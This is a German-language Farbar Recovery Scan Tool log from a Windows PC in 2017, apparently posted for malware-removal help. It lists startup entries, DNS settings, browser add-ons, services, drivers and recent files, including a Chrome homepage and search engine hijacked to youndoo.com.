HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:01 - 2017-05-21 21:01 - 00263448 ____N (Kaspersky Lab, Yury Parshin) C:\WINDOWS\system32\Drivers\95389174.sys
2017-05-21 21:00 - 2017-05-21 21:02 - 00285270 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-21 21:04 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
